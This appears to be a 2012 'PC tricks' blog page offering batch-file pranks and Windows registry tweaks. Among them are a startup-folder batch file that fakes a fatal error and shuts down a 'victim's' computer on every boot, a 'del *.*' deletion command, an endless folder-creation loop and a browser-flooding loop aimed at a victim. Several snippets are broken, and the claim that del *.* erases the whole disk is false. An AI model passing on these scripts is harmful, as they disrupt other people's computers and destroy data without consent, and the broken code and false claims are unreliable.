Welcome to pctricksstuff.com for more updates like us on facebook

Pages

Labels

Thursday 26 April 2012

Matrix Screen


Matrix Coding :

Next Trick that I’m gonna show you is to create similar to the Coded-Screen From the movie Matrix!!

 The screen where random numbers appear in the movie and a techie sits right in front of the computer and guides “Neo” through all troubles.

Anyway if you don’t have an idea just have a look at the matrix screen from the following youtube link here.


Lets try to create a similar screen just by using a notepad.

Just Copy paste the following code into your Notepad and save the file as Matrix.bat.”Matrix” is not necessary, you can save it with whatever name you wish but its important that you save it with .bat extension.

Here’s the code.

****************************
@echo off

color 02es

echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%

goto start
****************************

Your Screen Will Look Like This





This is nothing but usage of few simple notepad commands to create out Matrix screen.

Let us understand what these commands do and how they function in brief.

Echo - Echos the screen.

Color – Displays the text content in the color that you mentioned.

:- This is similar to the “go-to” marker in C-Language. (Not a problem if you’re not experienced with C-Language. Just thought you should know)

%random – This prints a random number on the screen.

goto – this points that the function must be passed to “start” again to make it an indefinite loop.

So Enjoy this Trick.

Reveal Password Behind Asterisk


Reveal *****(Asterisk) Passwords Using Javascript

Want to Reveal the Passwords Hidden Behind Asterisk (****) ?



Follow the steps given below-

1) Open the Login Page of any website. (eg. http://mail.yahoo.com)

2) Type your ‘Username’ and ‘Password’.

3) Copy and paste the JavaScript code given below into your browser’s address bar and press ‘Enter’.

javascript: alert(document.getElementById(‘Passwd’).value);

4) As soon as you press ‘Enter’, A window pops up showing Password typed by you..!

Legal Notice On Start Up


Legal Notice.

If your PC has multiple users then you can now display legal notice to every user before they login to your PC.

This legal notice will be displayed at every startup just before the Desktop is loaded.

Using this you can tell your friends about the do’s and dont’s in your computer when they login in your absence.

Well you can do this pretty easily. For this there is one small registry hack.

 Here is the step-by-step instruction to do this.

 1. Go to Start->Run, type regedit and hit ENTER

2. Navigate to the following key in the registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion
\policies\system

On the right side pane look for “legalnoticecaption“, double click on it and enter the desired Legal Notice Caption.

3. Next below this look for “legalnoticetext” and enter the desired Legal Notice Text.

The legal notice text can be up to a page in it’s size so that it can include a set of do’s and dont’s for your computer.

4. After you do this just restart your computer and upon the next startup you can see the legal notice information for your computer.

This trick works on both XP and Vista. You can also try it on Windows 7 and should work with no problems.

That's It Try And Enjoy This Trick.

Auto-Shutdown Computer


Auto-Shutdown Code :

This is the real deal.This trick is so simple and so easy,but really leeches-out the life of even the toughest of the programmers making them wonder how to fix it.

I’ll tell you each and everything about this but you will have to make sure you restore the computer back to normal after using this trick.

 Trust me its fun,not at all dangerous.

Its the kinda trick that is so easy and makes people wonder why is your computer acting so weird.

Lets get started. just open notepad and type the following code.



msg * Fatal Error! Your Computer Will Shutdown in few Moments!*
shutdown -t

That’s it!!! Yep! That’s the code, as simple as it looks. Now save it as virus.bat, or anything you wish, just make sure it’s under .bat extension.Now here’s the real deal that makes this trick so annoying.

Now take the batch file that you created and place it in the Windows startup.

For those of you all who don’t know where startup is, no problemo! It’s in Start(Windows button on the left bottom of your screen), and there it will be, the windows startup.Just place the batch file in it and your trick is set to play a prank on your victim.

The next time you switch on your computer your computer will look for the files in the startup directory and run them!! when your batch file is executed. It will display a message

“Fatal Error! Your Computer Will Shutdown in few Moments! “

You will next get a message box with a count-down for shutdown of your computer.

You will have just a minute to remove the batch file from the startup directory to stop this from running again.

Unless and until the file is removed from the startup .

Your computer will shutdown every time you turn it on!! So don’t forget to remove the file from the startup directory.

So Enjoy .

Restore All Setting In Samsung Phones


Restore all Your Phone Setting In Samsung  Phones.  



1. *2767*63342# auto restart indicates "insert sim"
2. *2767*3855# auto restart indicates "insert sim"
3. *2767*2878# auto restart indicates "insert sim"
4. *2767*927# auto restart indicates "insert sim"
5. *2767*7822573738# auto restart indicates "insert sim"

After Entering This Codes Your All Password And Phone Setting Will Be Restored As It Was There When U Purchased The Phone.

Changing Logon Screen

Want Change Your Log On Screen Then Here Is The Trick.
 
How would you like to change the logon screen background in Windows 7 so as to give your Windows a customized look and feel?

With a small tweak it is possible to customize the Windows 7 logon screen and set your own picture/wallpaper as the background.

 Changing logon screen background in Windows 7 is as simple as changing your desktop wallpaper.

Well here is a step by step instruction to customize the logon screen background.




1. The image you need to set as the background should be a .jpg file and it’s size should not exceed 245KB.

2. The image resolution can be anything of your choice. However I prefer 1440 x 900 or 1024 x 768.

 You can use any of the photo editing software such as Photoshop to compress and set the resolution for your image. Once you’re done, save this image as backgroundDefault.jpg.

3. You will need to copy this image to

C:\Windows\system32\oobe\info\backgrounds

You will need to create that path if it does not already exist on your computer.

4. Now open the Registry Editor (Start -> Run -> Type regedit) and navigate to the following key

HKLM\Software\Microsoft\Windows\CurrentVersion\Authentication\
LogonUI\Background

If Background does not exist rightclick LogonUI, select New and then Key, and then name it Background.

 Now locate OEMBackground (listed on the right side). If it does not exist, right-click Background and select New and then DWORD and name it OEMBackground.

5. Double-click on OEMBackground and set the Value Data to 1.

6. Now log-off to see the new logon screen background. If you would like to revert back to the default background, just set the Value Data back to 0.

Enjoy This Trick.

Creating 3000 Folder's in an Minute


Create more than 3,000 folders under a minute.

Step 1) Open your notepad and type the following code.

                    @echo off
                    :top
                    md %random%
                    goto top


Step 2) Save it as 1000.bat

@echo off makes your screen appear blank but it is actually making hundreds of folders.
md %random% is command that creating folders with random names.( md is a command to make directory in ms-dos)
goto top – return the command to :top, causes an infinite loop.

So that's it .

Deleting System Files


Delete all your system files with just 6 character command.
Copy the following code into your notepad and save it as a .bat file.


                                                     del *.*


All your files in your hard disk will vanish in less than 5mins.

Once Again i am warning you not to try this at in your PC. DO NOT TRY THESE FOR FUN!!

Ram Crashing Trick.


Open Notepad And Type

:A
start www.pctricksstuff.blogspot.com
goto A

save with .bat extension.
Infinitely loops your browser to open up coolpctips.



Do this and your victim will have infinite pages of pctricks flooded on his computer screen.